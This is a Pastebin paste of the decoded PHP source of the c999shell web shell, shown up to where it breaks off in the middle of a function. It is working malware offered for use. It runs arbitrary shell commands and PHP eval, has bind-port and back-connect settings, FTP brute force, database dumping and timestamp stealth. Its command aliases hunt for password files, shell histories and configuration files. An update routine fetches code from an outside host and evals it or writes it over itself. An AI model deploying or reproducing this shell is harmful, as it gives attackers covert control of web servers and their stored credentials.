RoryPrayana

C99 decoded by jok3d

Aug 14th, 2014
280
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 170.24 KB | None | 0 0
  1. <?php
  2. //Starting calls
  3. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  4. error_reporting(5);
  5. @ignore_user_abort(TRUE);
  6. @set_magic_quotes_runtime(0);
  7. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  8. define("starttime",getmicrotime());
  9. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  10. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  11. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  12.  
  13. $shver = "1.0 pre-release build #16"; //Current version
  14. //CONFIGURATION AND SETTINGS
  15. if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
  16. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
  17. else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
  18. }
  19.  
  20. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  21.  
  22. if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  23. if (empty($surl))
  24. {
  25.  $surl = "?".$includestr; //Self url
  26. }
  27. $surl = htmlspecialchars($surl);
  28.  
  29. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  30. //Authentication
  31. $login = ""; //login
  32. //DON'T FORGOT ABOUT PASSWORD!!!
  33. $pass = ""; //password
  34. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  35. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  36. $login_txt = "Restricted area"; //http-auth message.
  37. $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
  38. $gzipencode = TRUE; //Encode with gzip?
  39. $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
  40. $ax4 ="http://";
  41. $c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
  42. $c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
  43. $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  44. $donated_html = "<center><b>Owned by hacker</b></center>";
  45. /* If you publish free shell and you wish
  46. add link to your site or any other information,
  47. put here your html. */
  48. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  49. $curdir = "./"; //start folder
  50. //$curdir = getenv("DOCUMENT_ROOT");
  51. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  52. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  53.  
  54. $log_email = "user@host.tld"; //Default e-mail for sending logs
  55.  
  56. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  57. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  58.  
  59. // Registered file-types.
  60. //  array(
  61. //   "{action1}"=>array("ext1","ext2","ext3",...),
  62. //   "{action2}"=>array("ext4","ext5","ext6",...),
  63. //   ...
  64. //  )
  65. $ftypes  = array(
  66.  "html"=>array("html","htm","shtml"),
  67.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  68.  "exe"=>array("sh","install","bat","cmd"),
  69.  "ini"=>array("ini","inf"),
  70.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  71.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  72.  "sdb"=>array("sdb"),
  73.  "phpsess"=>array("sess"),
  74.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  75. );
  76.  
  77. // Registered executable file-types.
  78. //  array(
  79. //   string "command{i}"=>array("ext1","ext2","ext3",...),
  80. //   ...
  81. //  )
  82. //   {command}: %f% = filename
  83. $exeftypes  = array(
  84.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  85.  "perl %f%" => array("pl","cgi")
  86. );
  87.  
  88. /* Highlighted files.
  89.   array(
  90.    i=>array({regexp},{type},{opentag},{closetag},{break})
  91.    ...
  92.   )
  93.   string {regexp} - regular exp.
  94.   int {type}:
  95. 0 - files and folders (as default),
  96. 1 - files only, 2 - folders only
  97.   string {opentag} - open html-tag, e.g. "<b>" (default)
  98.   string {closetag} - close html-tag, e.g. "</b>" (default)
  99.   bool {break} - if TRUE and found match then break
  100. */
  101. $regxp_highlight  = array(
  102.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  103.   array("config.php",1) // example
  104. );
  105.  
  106. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  107.  // array (i=>{letter} ...); string {letter} - letter of a drive
  108. //$safemode_diskettes = range("a","z");
  109. $hexdump_lines = 8;// lines in hex preview file
  110. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  111. $cx7 =".com";
  112. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  113.  
  114. $bindport_pass = "c999";  // default password for binding
  115. $bindport_port = "31373"; // default port for binding
  116. $bc_port = "31373"; // default port for back-connect
  117. $cx4 ="/x.";
  118. $datapipe_localport = "8081"; // default port for datapipe
  119.  
  120. // Command-aliases
  121. if (!$win)
  122. {
  123.  $cmdaliases = array(
  124.   array("-----------------------------------------------------------", "ls -la"),
  125.   array("find all suid files", "find / -type f -perm -04000 -ls"),
  126.   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  127.   array("find all sgid files", "find / -type f -perm -02000 -ls"),
  128.   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  129.   array("find config.inc.php files", "find / -type f -name config.inc.php"),
  130.   array("find config* files", "find / -type f -name \"config*\""),
  131.   array("find config* files in current dir", "find . -type f -name \"config*\""),
  132.   array("find all writable folders and files", "find / -perm -2 -ls"),
  133.   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  134.   array("find all service.pwd files", "find / -type f -name service.pwd"),
  135.   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  136.   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  137.   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  138.   array("find all .bash_history files", "find / -type f -name .bash_history"),
  139.   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  140.   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  141.   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  142.   array("list file attributes on a Linux second extended file system", "lsattr -va"),
  143.   array("show opened ports", "netstat -an | grep -i listen")
  144.  );
  145. }
  146. else
  147. {
  148.  $cmdaliases = array(
  149.   array("-----------------------------------------------------------", "dir"),
  150.   array("show opened ports", "netstat -an")
  151.  );
  152. }
  153.  
  154. $sess_cookie = "c999shvars"; // Cookie-variable name
  155.  
  156. $usefsbuff = TRUE; //Buffer-function
  157. $px7 ="html";  
  158. $copy_unset = FALSE; //Remove copied files from buffer after pasting
  159.  
  160. //Quick launch
  161. $quicklaunch = array(
  162.  array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  163.  array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  164.  array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  165.  array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  166.  array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  167.  array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  168.  array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  169.  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  170.  array("<b>Tools</b>",$surl."act=tools&d=%d"),
  171.  array("<b>Proc.</b>",$surl."act=processes&d=%d"),
  172.  array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
  173.  array("<b>Sec.</b>",$surl."act=security&d=%d"),
  174.  array("<b>SQL</b>",$surl."act=sql&d=%d"),
  175.  array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
  176.  array("<b>Update</b>",$surl."act=update&d=%d"),
  177.  array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
  178.  array("<b>Self remove</b>",$surl."act=selfremove"),
  179.  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  180. );
  181.  
  182. //Highlight-code colors
  183. $highlight_background = "#c0c0c0";
  184. $highlight_bg = "#FFFFFF";
  185. $highlight_comment = "#6A6A6A";
  186. $highlight_default = "#0000BB";
  187. $highlight_html = "#1300FF";
  188. $highlight_keyword = "#007700";
  189. $highlight_string = "#000000";
  190.  
  191. @$f = $_REQUEST["f"];
  192. @extract($_REQUEST["c999shcook"]);
  193.  
  194. //END CONFIGURATION
  195.  
  196.  
  197. // \/Next code isn't for editing\/
  198. @set_time_limit(0);
  199. $tmp = array();
  200. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  201. $s = "!^(".implode("|",$tmp).")$!i";
  202. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc999shell\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  203. if (!empty($login))
  204. {
  205.  if (empty($md5_pass)) {$md5_pass = md5($pass);}
  206.  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  207.  {
  208.   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  209.   header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
  210.   header("HTTP/1.0 401 Unauthorized");
  211.   exit($accessdeniedmess);
  212.  }
  213. }
  214. if ($act != "img")
  215. {
  216. $lastdir = realpath(".");
  217. chdir($curdir);
  218. if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
  219. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  220. if (!is_array($sess_data)) {$sess_data = array();}
  221. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  222. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  223.  
  224. $disablefunc = @ini_get("disable_functions");
  225. if (!empty($disablefunc))
  226. {
  227.  $disablefunc = str_replace(" ","",$disablefunc);
  228.  $disablefunc = explode(",",$disablefunc);
  229. }
  230.  
  231. if (!function_exists("c999_buff_prepare"))
  232. {
  233. function c999_buff_prepare()
  234. {
  235.  global $sess_data;
  236.  global $act;
  237.  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  238.  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  239.  $sess_data["copy"] = array_unique($sess_data["copy"]);
  240.  $sess_data["cut"] = array_unique($sess_data["cut"]);
  241.  sort($sess_data["copy"]);
  242.  sort($sess_data["cut"]);
  243.  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  244.  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  245. }
  246. }
  247. c999_buff_prepare();
  248. if (!function_exists("c999_sess_put"))
  249. {
  250. function c999_sess_put($data)
  251. {
  252.  global $sess_cookie;
  253.  global $sess_data;
  254.  c999_buff_prepare();
  255.  $sess_data = $data;
  256.  $data = serialize($data);
  257.  setcookie($sess_cookie,$data);
  258. }
  259. }
  260. foreach (array("sort","sql_sort") as $v)
  261. {
  262.  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  263.  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  264. }
  265. if ($sort_save)
  266. {
  267.  if (!empty($sort)) {setcookie("sort",$sort);}
  268.  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  269. }
  270. if (!function_exists("str2mini"))
  271. {
  272. function str2mini($content,$len)
  273. {
  274.  if (strlen($content) > $len)
  275.  {
  276.   $len = ceil($len/2) - 2;
  277.   return substr($content, 0,$len)."...".substr($content,-$len);
  278.  }
  279.  else {return $content;}
  280. }
  281. }
  282. if (!function_exists("view_size"))
  283. {
  284. function view_size($size)
  285. {
  286.  if (!is_numeric($size)) {return FALSE;}
  287.  else
  288.  {
  289.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  290.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  291.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  292.   else {$size = $size . " B";}
  293.   return $size;
  294.  }
  295. }
  296. }
  297. if (!function_exists("fs_copy_dir"))
  298. {
  299. function fs_copy_dir($d,$t)
  300. {
  301.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  302.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  303.  $h = opendir($d);
  304.  while (($o = readdir($h)) !== FALSE)
  305.  {
  306.   if (($o != ".") and ($o != ".."))
  307.   {
  308.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  309.    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  310.    if (!$ret) {return $ret;}
  311.   }
  312.  }
  313.  closedir($h);
  314.  return TRUE;
  315. }
  316. }
  317. if (!function_exists("fs_copy_obj"))
  318. {
  319. function fs_copy_obj($d,$t)
  320. {
  321.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  322.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  323.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  324.  if (is_dir($d))
  325.  {
  326.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  327.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  328.   return fs_copy_dir($d,$t);
  329.  }
  330.  elseif (is_file($d)) {return copy($d,$t);}
  331.  else {return FALSE;}
  332. }
  333. }
  334. if (!function_exists("fs_move_dir"))
  335. {
  336. function fs_move_dir($d,$t)
  337. {
  338.  $h = opendir($d);
  339.  if (!is_dir($t)) {mkdir($t);}
  340.  while (($o = readdir($h)) !== FALSE)
  341.  {
  342.   if (($o != ".") and ($o != ".."))
  343.   {
  344.    $ret = TRUE;
  345.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  346.    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  347.    if (!$ret) {return $ret;}
  348.   }
  349.  }
  350.  closedir($h);
  351.  return TRUE;
  352. }
  353. }
  354. if (!function_exists("fs_move_obj"))
  355. {
  356. function fs_move_obj($d,$t)
  357. {
  358.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  359.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  360.  if (is_dir($d))
  361.  {
  362.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  363.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  364.   return fs_move_dir($d,$t);
  365.  }
  366.  elseif (is_file($d))
  367.  {
  368.   if(copy($d,$t)) {return unlink($d);}
  369.   else {unlink($t); return FALSE;}
  370.  }
  371.  else {return FALSE;}
  372. }
  373. }
  374. if (!function_exists("fs_rmdir"))
  375. {
  376. function fs_rmdir($d)
  377. {
  378.  $h = opendir($d);
  379.  while (($o = readdir($h)) !== FALSE)
  380.  {
  381.   if (($o != ".") and ($o != ".."))
  382.   {
  383.    if (!is_dir($d.$o)) {unlink($d.$o);}
  384.    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  385.   }
  386.  }
  387.  closedir($h);
  388.  rmdir($d);
  389.  return !is_dir($d);
  390. }
  391. }
  392. if (!function_exists("fs_rmobj"))
  393. {
  394. function fs_rmobj($o)
  395. {
  396.  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  397.  if (is_dir($o))
  398.  {
  399.   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  400.   return fs_rmdir($o);
  401.  }
  402.  elseif (is_file($o)) {return unlink($o);}
  403.  else {return FALSE;}
  404. }
  405. }
  406. if (!function_exists("myshellexec"))
  407. {
  408. function myshellexec($cmd)
  409. {
  410.  global $disablefunc;
  411.  $result = "";
  412.  if (!empty($cmd))
  413.  {
  414.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  415.   elseif (($result = `$cmd`) !== FALSE) {}
  416.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  417.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  418.   elseif (is_resource($fp = popen($cmd,"r")))
  419.   {
  420.    $result = "";
  421.    while(!feof($fp)) {$result .= fread($fp,1024);}
  422.    pclose($fp);
  423.   }
  424.  }
  425.  return $result;
  426. }
  427. }
  428. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  429. if (!function_exists("view_perms"))
  430. {
  431. function view_perms($mode)
  432. {
  433.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  434.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  435.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  436.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  437.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  438.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  439.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  440.  else {$type = "?";}
  441.  
  442.  $owner["read"] = ($mode & 00400)?"r":"-";
  443.  $owner["write"] = ($mode & 00200)?"w":"-";
  444.  $owner["execute"] = ($mode & 00100)?"x":"-";
  445.  $group["read"] = ($mode & 00040)?"r":"-";
  446.  $group["write"] = ($mode & 00020)?"w":"-";
  447.  $group["execute"] = ($mode & 00010)?"x":"-";
  448.  $world["read"] = ($mode & 00004)?"r":"-";
  449.  $world["write"] = ($mode & 00002)? "w":"-";
  450.  $world["execute"] = ($mode & 00001)?"x":"-";
  451.  
  452.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  453.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  454.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  455.  
  456.  return $type.join("",$owner).join("",$group).join("",$world);
  457. }
  458. }
  459. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  460. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  461. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  462. if (!function_exists("parse_perms"))
  463. {
  464. function parse_perms($mode)
  465. {
  466.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  467.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  468.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  469.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  470.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  471.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  472.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  473.  else {$t = "?";}
  474.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  475.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  476.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  477.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  478. }
  479. }
  480. if (!function_exists("parsesort"))
  481. {
  482. function parsesort($sort)
  483. {
  484.  $one = intval($sort);
  485.  $second = substr($sort,-1);
  486.  if ($second != "d") {$second = "a";}
  487.  return array($one,$second);
  488. }
  489. }
  490. if (!function_exists("view_perms_color"))
  491. {
  492. function view_perms_color($o)
  493. {
  494.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  495.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  496.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  497. }
  498. }
  499. if (!function_exists("c999getsource"))
  500. {
  501. function c999getsource($fn)
  502. {
  503.  global $c999sh_sourcesurl;
  504.  $array = array(
  505.   "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
  506.   "c999sh_bindport.c" => "c999sh_bindport_c.txt",
  507.   "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
  508.   "c999sh_backconn.c" => "c999sh_backconn_c.txt",
  509.   "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
  510.   "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
  511.  );
  512.  $name = $array[$fn];
  513.  if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
  514.  else {return FALSE;}
  515. }
  516. }
  517. if (!function_exists("c999sh_getupdate"))
  518. {
  519. function c999sh_getupdate($update = TRUE)
  520. {
  521.  $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  522.  $data = @file_get_contents($url);
  523.  if (!$data) {return "Can't connect to update-server!";}
  524.  else
  525.  {
  526.   $data = ltrim($data);
  527.   $string = substr($data,3,ord($data{2}));
  528.   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
  529.   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  530.   if ($data{0} == "\x99" and $data{1} == "\x03")
  531.   {
  532.    $string = explode("\x01",$string);
  533.    if ($update)
  534.    {
  535.     $confvars = array();
  536.     $sourceurl = $string[0];
  537.     $source = file_get_contents($sourceurl);
  538.     if (!$source) {return "Can't fetch update!";}
  539.     else
  540.     {
  541.      $fp = fopen(__FILE__,"w");
  542.      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  543.      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
  544.     }
  545.    }
  546.    else {return "New version are available: ".$string[1];}
  547.   }
  548.   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  549.   else {return "Error in protocol: segmentation failed! (".$data.") ";}
  550.  }
  551. }
  552. }
  553. if (!function_exists("mysql_dump"))
  554. {
  555. function mysql_dump($set)
  556. {
  557.  global $shver;
  558.  $sock = $set["sock"];
  559.  $db = $set["db"];
  560.  $print = $set["print"];
  561.  $nl2br = $set["nl2br"];
  562.  $file = $set["file"];
  563.  $add_drop = $set["add_drop"];
  564.  $tabs = $set["tabs"];
  565.  $onlytabs = $set["onlytabs"];
  566.  $ret = array();
  567.  $ret["err"] = array();
  568.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  569.  if (empty($db)) {$db = "db";}
  570.  if (empty($print)) {$print = 0;}
  571.  if (empty($nl2br)) {$nl2br = 0;}
  572.  if (empty($add_drop)) {$add_drop = TRUE;}
  573.  if (empty($file))
  574.  {
  575.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  576.  }
  577.  if (!is_array($tabs)) {$tabs = array();}
  578.  if (empty($add_drop)) {$add_drop = TRUE;}
  579.  if (sizeof($tabs) == 0)
  580.  {
  581.   // retrive tables-list
  582.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  583.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  584.  }
  585.  $out = "# Dumped by c999Shell.SQL v. ".$shver."
  586. # Home page: http://ccteam.ru
  587. #
  588. # Host settings:
  589. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  590. # Date: ".date("d.m.Y H:i:s")."
  591. # DB: \"".$db."\"
  592. #---------------------------------------------------------
  593. ";
  594.  $c = count($onlytabs);
  595.  foreach($tabs as $tab)
  596.  {
  597.   if ((in_array($tab,$onlytabs)) or (!$c))
  598.   {
  599.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  600.    // recieve query for create table structure
  601.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  602.    if (!$res) {$ret["err"][] = mysql_smarterror();}
  603.    else
  604.    {
  605.     $row = mysql_fetch_row($res);
  606.     $out .= $row["1"].";\n\n";
  607.     // recieve table variables
  608.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  609.     if (mysql_num_rows($res) > 0)
  610.     {
  611.      while ($row = mysql_fetch_assoc($res))
  612.      {
  613.       $keys = implode("`, `", array_keys($row));
  614.       $values = array_values($row);
  615.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  616.       $values = implode("', '", $values);
  617.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  618.       $out .= $sql;
  619.      }
  620.     }
  621.    }
  622.   }
  623.  }
  624.  $out .= "#---------------------------------------------------------------------------------\n\n";
  625.  if ($file)
  626.  {
  627.   $fp = fopen($file, "w");
  628.   if (!$fp) {$ret["err"][] = 2;}
  629.   else
  630.   {
  631.    fwrite ($fp, $out);
  632.    fclose ($fp);
  633.   }
  634.  }
  635.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  636.  return $out;
  637. }
  638. }
  639. if (!function_exists("mysql_buildwhere"))
  640. {
  641. function mysql_buildwhere($array,$sep=" and",$functs=array())
  642. {
  643.  if (!is_array($array)) {$array = array();}
  644.  $result = "";
  645.  foreach($array as $k=>$v)
  646.  {
  647.   $value = "";
  648.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  649.   $value .= "'".addslashes($v)."'";
  650.   if (!empty($functs[$k])) {$value .= ")";}
  651.   $result .= "`".$k."` = ".$value.$sep;
  652.  }
  653.  $result = substr($result,0,strlen($result)-strlen($sep));
  654.  return $result;
  655. }
  656. }
  657. if (!function_exists("mysql_fetch_all"))
  658. {
  659. function mysql_fetch_all($query,$sock)
  660. {
  661.  if ($sock) {$result = mysql_query($query,$sock);}
  662.  else {$result = mysql_query($query);}
  663.  $array = array();
  664.  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  665.  mysql_free_result($result);
  666.  return $array;
  667. }
  668. }
  669. if (!function_exists("mysql_smarterror"))
  670. {
  671. function mysql_smarterror($type,$sock)
  672. {
  673.  if ($sock) {$error = mysql_error($sock);}
  674.  else {$error = mysql_error();}
  675.  $error = htmlspecialchars($error);
  676.  return $error;
  677. }
  678. }
  679. if (!function_exists("mysql_query_form"))
  680. {
  681. function mysql_query_form()
  682. {
  683.  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  684.  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  685.  if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
